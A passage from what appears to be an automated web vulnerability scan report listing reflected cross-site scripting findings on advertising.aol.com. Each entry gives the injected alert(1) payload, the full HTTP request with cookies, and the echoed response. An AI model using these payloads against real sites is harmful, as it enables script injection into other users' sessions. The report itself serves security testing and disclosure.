...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.php99290"-alert(1)-"21295270dc0?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,a
...[SNIP]...

1.11. http://advertising.aol.com/token/0/3/1519578957/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1519578957/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d892"-alert(1)-"2c2267ee8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8d892"-alert(1)-"2c2267ee8cd/0/3/1519578957/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8d892"-alert(1)-"2c2267ee8cd/0/3/1519578957/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.12. http://advertising.aol.com/token/0/3/1871799369/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1871799369/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a3d"-alert(1)-"387ea09717f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /92a3d"-alert(1)-"387ea09717f/0/3/1871799369/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:51:41 GMT
ETag: "e03442e11aed0ea9e1ad4331f1d0fcc0"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/92a3d"-alert(1)-"387ea09717f/0/3/1871799369/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.13. http://advertising.aol.com/token/0/3/568890758/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/568890758/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ecc"-alert(1)-"f59af658d37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /21ecc"-alert(1)-"f59af658d37/0/3/568890758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/21ecc"-alert(1)-"f59af658d37/0/3/568890758/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.14. http://advertising.aol.com/token/1/3/294660798/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/294660798/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c8e1"-alert(1)-"d188184ba9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7c8e1"-alert(1)-"d188184ba9e/1/3/294660798/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7c8e1"-alert(1)-"d188184ba9e/1/3/294660798/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.15. http://advertising.aol.com/token/1/3/394991681/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/394991681/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ccb4"-alert(1)-"0a1eef0a385 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2ccb4"-alert(1)-"0a1eef0a385/1/3/394991681/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/2ccb4"-alert(1)-"0a1eef0a385/1/3/394991681/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.16. http://advertising.aol.com/token/1/3/952081387/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/952081387/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125aa"-alert(1)-"41b87e2863c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /125aa"-alert(1)-"41b87e2863c/1/3/952081387/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/125aa"-alert(1)-"41b87e2863c/1/3/952081387/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.17. http://advertising.aol.com/token/2/3/1071185428/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/1071185428/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca3d"-alert(1)-"7d2af4878a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aca3d"-alert(1)-"7d2af4878a3/2/3/1071185428/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/aca3d"-alert(1)-"7d2af4878a3/2/3/1071185428/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.18. http://advertising.aol.com/token/2/3/434607676/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/434607676/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a006"-alert(1)-"331193e93c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6a006"-alert(1)-"331193e93c0/2/3/434607676/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6a006"-alert(1)-"331193e93c0/2/3/434607676/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.19. http://advertising.aol.com/token/2/3/673766767/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/673766767/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb484"-alert(1)-"431fc0a02e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cb484"-alert(1)-"431fc0a02e0/2/3/673766767/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/cb484"-alert(1)-"431fc0a02e0/2/3/673766767/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.20. http://advertising.aol.com/token/3/3/1881533869/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/1881533869/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f43"-alert(1)-"db3b6157138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /90f43"-alert(1)-"db3b6157138/3/3/1881533869/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/90f43"-alert(1)-"db3b6157138/3/3/1881533869/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.21. http://advertising.aol.com/token/3/3/613602259/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/613602259/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be31"-alert(1)-"ccced9a65eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2be31"-alert(1)-"ccced9a65eb/3/3/613602259/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:23 GMT
Cache-Control: store, no-cache, must-revalidate
